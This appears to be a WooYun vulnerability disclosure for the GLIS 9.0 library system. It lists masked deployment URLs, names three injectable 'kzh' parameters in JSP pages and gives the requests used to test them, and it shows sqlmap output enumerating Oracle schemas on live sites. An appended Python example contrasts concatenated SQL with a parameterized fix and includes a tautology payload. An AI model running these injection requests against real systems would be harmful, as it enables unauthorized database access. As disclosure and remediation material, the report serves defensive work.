### Brief description:

See title.

### Details:

```
Vendor: Beijing Qingda Xinyang Technology Co., Ltd. (北京清大新洋科技有限公司)
Official site: http://**.**.**.**/
Customers: http://**.**.**.**/yonghu.html
```

This system is sold at quite a price; see the product quote: http://**.**.**.**/cp/glis90.html

```
Product name: General Library Integrated System GLIS 9.0
List price: 198,000 yuan (FOR WIN), 228,000 yuan (FOR UNIX)
Reseller price: 138,600 yuan (FOR WIN), 159,600 yuan (FOR UNIX)
Other: the prices above are for the basic edition; each additional user adds 5,000 yuan.
```

Every time I submit a bug on WooYun I first look at earlier submitters' bugs, then keep digging:

- http://**.**.**.**/bugs/wooyun-2010-099335
- http://**.**.**.**/bugs/wooyun-2014-079840
- http://**.**.**.**/bugs/wooyun-2010-085319
- http://**.**.**.**/bugs/wooyun-2010-082667

Seeing the customer list still made me shiver a bit... see the screenshot:

[![client.png](https://images.seebug.org/upload/201508/0618032964f830713c6edfa51de4943830deebd0.png)](https://images.seebug.org/upload/201508/0618032964f830713c6edfa51de4943830deebd0.png)

There are many deployments; a casual search turns up plenty. Here are some (22):

```
http://**.**.**.**:8000/opac/
http://**.**.**.**/opac/
**.**.**.**:8090/opac/
**.**.**.**:8089/opac/
http://**.**.**.**:8090/opac/
**.**.**.**:8089/opac/
**.**.**.**:8089/opac/
**.**.**.**:8070/opac/
http://**.**.**.**:8000/opac/
**.**.**.**:8070/opac/
**.**.**.**/opac/
http://**.**.**.**:8070/
**.**.**.**:8086/opac/
**.**.**.**:8088/opac/
**.**.**.**:8089/opac/
**.**.**.**:8070/opac/
**.**.**.**:8080/opac/
**.**.**.**:8089/opac/
**.**.**.**:8070/opac/
**.**.**.**:8070/opac/
**.**.**.**:8070/opac/
**.**.**.**:8070/opac/
```

Enough chatter, on to the bugs:

Injection 1:

```
File: xskp.jsp
POST parameter kzh is injectable
```

Injection 2:

```
File: ckmarc.jsp
POST parameter kzh is injectable
```

Injection 3:

```
File: eaaldetail.jsp
Parameter kzh is injectable
```

All three of the above have been checked against previously submitted bugs and are not duplicates. Two cases are given as proof for each injection.

#### Injection 1

Case 1:

```
**.**.**.**:8088//opac/xskp.jsp
POST: kzh=zyk0040640&dztm=&dctm=
```

[![0806_2.png](https://images.seebug.org/upload/201508/061814515b3d8f2583b3399344f9cce82274b811.png)](https://images.seebug.org/upload/201508/061814515b3d8f2583b3399344f9cce82274b811.png)

[![0806_2_1.png](https://images.seebug.org/upload/201508/061816257132ec0b52b8b5b711ca016649e2a454.png)](https://images.seebug.org/upload/201508/061816257132ec0b52b8b5b711ca016649e2a454.png)

Database info (17 schemas):

```
web application technology: JSP
back-end DBMS: Oracle
[18:13:30] [INFO] fetching current user
[18:13:30] [WARNING] reflective value(s) found and filtering ou
current user: 'USRGLIS'
[18:13:30] [INFO] fetching current database
current schema (equivalent to database on Oracle): 'USRGLIS'
[18:13:30] [WARNING] schema names are going to be used on Oracl as the counterpart to database names on other DBMSes
[18:13:30] [INFO] fetching database (schema) names
available databases [17]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSG
[*] TSMSYS
[*] USRGLIS
[*] WMSYS
[*] XDB
```

Case 2:

```
**.**.**.**:8080/opac/xskp.jsp
POST: kzh=zyk0040640&dztm=&dctm=
```

[![0806_2_2.png](https://images.seebug.org/upload/201508/061856095f66bfa34d266fbf75e10e3256f1a76f.png)](https://images.seebug.org/upload/201508/061856095f66bfa34d266fbf75e10e3256f1a76f.png)

#### Injection 2

Case 1:

```
**.**.**.**:8088//opac/ckmarc.jsp
POST: kzh=zyk0040640
```

[![0806_3.png](https://images.seebug.org/upload/201508/061819592384239069361d0781f03b20262daae5.png)](https://images.seebug.org/upload/201508/061819592384239069361d0781f03b20262daae5.png)

Case 2:

```
**.**.**.**:8080/opac/ckmarc.jsp
POST: kzh=zyk0040640
```

[![0806_3_1.png](https://images.seebug.org/upload/201508/0618405455c9d5acc8a86ac2bdab7806ae12f1e6.png)](https://images.seebug.org/upload/201508/0618405455c9d5acc8a86ac2bdab7806ae12f1e6.png)

Database info:

```
web application technology: JSP
back-end DBMS: Oracle
[18:36:49] [INFO] fetching current user
current user: 'USRGLIS'
[18:36:49] [INFO] fetching current database
current schema (equivalent to database on Oracle): 'USRGLIS'
[18:36:49] [WARNING] schema names are going to be used on Oracle as the counterpart to database names on other DBMSes
[18:36:49] [INFO] fetching database (schema) names
[18:36:51] [INFO] the SQL query used returns 9 entries
[18:36:51] [INFO] starting 5 threads
[18:36:52] [INFO] retrieved: "EXFSYS"
[18:36:52] [INFO] retrieved: "APEX_030200"
[18:36:52] [INFO] retrieved: "MDSYS"
[18:36:52] [INFO] retrieved: "CTXSYS"
[18:36:52] [INFO] retrieved: "OLAPSYS"
[18:36:55] [INFO] retrieved: "SYSTEM"
[18:36:55] [INFO] retrieved: "XDB"
[18:36:55] [INFO] retrieved: "USRGLIS"
[18:36:55] [INFO] retrieved: "SYS"
available databases [9]:
[*] APEX_030200
[*] CTXSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] SYS
[*] SYSTEM
[*] USRGLIS
[*] XDB
```

#### Injection 3

Case 1:

```
**.**.**.**:8088//opac/eaal/eaaldetail.jsp?kzh=zyk0040640
```

[![0806_7.png](https://images.seebug.org/upload/201508/0618254135bda86510a260cb41dc93ce9986e677.png)](https://images.seebug.org/upload/201508/0618254135bda86510a260cb41dc93ce9986e677.png)

Check the user and database:

[![0806_7_1.png](https://images.seebug.org/upload/201508/0618263917411ed469dc3e46bf28d43ede2fd147.png)](https://images.seebug.org/upload/201508/0618263917411ed469dc3e46bf28d43ede2fd147.png)

Case 2:

```
**.**.**.**/opac/eaal/eaaldetail.jsp?kzh=zyk0040640
```

[![0806_7_6.png](https://images.seebug.org/upload/201508/06182746c7ad5866d663b8fa272b751e5211a256.png)](https://images.seebug.org/upload/201508/06182746c7ad5866d663b8fa272b751e5211a256.png)

Case 3:

```
**.**.**.**:8080/opac/eaal/eaaldetail.jsp?kzh=zyk0040640
```

[![0806_7_3.png](https://images.seebug.org/upload/201508/0618294063a18b87a858100b7917a0f38c50fba1.png)](https://images.seebug.org/upload/201508/0618294063a18b87a858100b7917a0f38c50fba1.png)

Database:

[![0806_7_4.png](https://images.seebug.org/upload/201508/061830018b1742706fe9884cd670f104b520fc96.png)](https://images.seebug.org/upload/201508/061830018b1742706fe9884cd670f104b520fc96.png)

### Proof of vulnerability:

Proven above.
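All three reported bugs share one root cause: the `kzh` request parameter reaches the SQL text unbound. The following is an added example, not code from the original report or from the GLIS vendor, that shows the concatenation pattern behind such a bug next to its parameterized replacement. It uses an in-memory SQLite table named `holdings` with a few constructed rows (the real system runs Oracle, but binding works the same way through any DB-API or JDBC driver), and the `KZH_PATTERN` allow-list is an assumption drawn from the shape of the `zyk0040640` values on the page, not the vendor's actual rule.

```python
"""
Added example: string-built query versus bound parameter for a `kzh` lookup.
Table, rows and the kzh format check are constructed for this demo.
"""
import re
import sqlite3

# Constructed sample data standing in for the library's holdings table.
SAMPLE_ROWS = [
    ("zyk0040640", "Introduction to Algorithms", "available"),
    ("zyk0040641", "Operating System Concepts", "on loan"),
    ("zyk0040642", "Database System Concepts", "available"),
]

# Assumed shape of a control number: short alphabetic prefix plus digits.
# This is an allow-list check added for the demo, not the vendor's rule.
KZH_PATTERN = re.compile(r"^[A-Za-z]{1,4}\d{4,12}$")


def make_db():
    """Create the constructed in-memory table used by both lookups."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE holdings (kzh TEXT, title TEXT, status TEXT)")
    conn.executemany("INSERT INTO holdings VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn, kzh):
    """The defective pattern: the parameter is pasted into the SQL text,
    so a quote inside it changes the query's structure."""
    sql = "SELECT kzh, title, status FROM holdings WHERE kzh = '" + kzh + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, kzh):
    """Hardened form: reject implausible input, then bind the value so the
    driver only ever compares it as data, never parses it as SQL."""
    if not KZH_PATTERN.match(kzh):
        return []
    sql = "SELECT kzh, title, status FROM holdings WHERE kzh = ?"
    return conn.execute(sql, (kzh,)).fetchall()


def stray_quote_breaks_query(conn):
    """A single stray quote is enough to make the concatenated query fail;
    this is the error that error-based detection tooling keys on."""
    try:
        lookup_vulnerable(conn, "zyk0040640'")
    except sqlite3.OperationalError:
        return True
    return False


def demo():
    """Run both lookups with a normal value and with a constructed
    always-true input; return the row sets so they can be compared."""
    conn = make_db()
    tautology = "' OR '1'='1"  # constructed input, not from the report
    return {
        "normal_vuln": lookup_vulnerable(conn, "zyk0040640"),
        "normal_safe": lookup_parameterized(conn, "zyk0040640"),
        "taut_vuln": lookup_vulnerable(conn, tautology),
        "taut_safe": lookup_parameterized(conn, tautology),
        "stray_quote_errors": stray_quote_breaks_query(conn),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

Running it shows the concatenated query returning every row for the constructed always-true input and raising on a stray quote, while the bound query returns the one matching row for a real control number and nothing otherwise. The same fix applies in the JSP: build the statement once with a `?` placeholder and pass `kzh` through `PreparedStatement.setString` rather than into the query string.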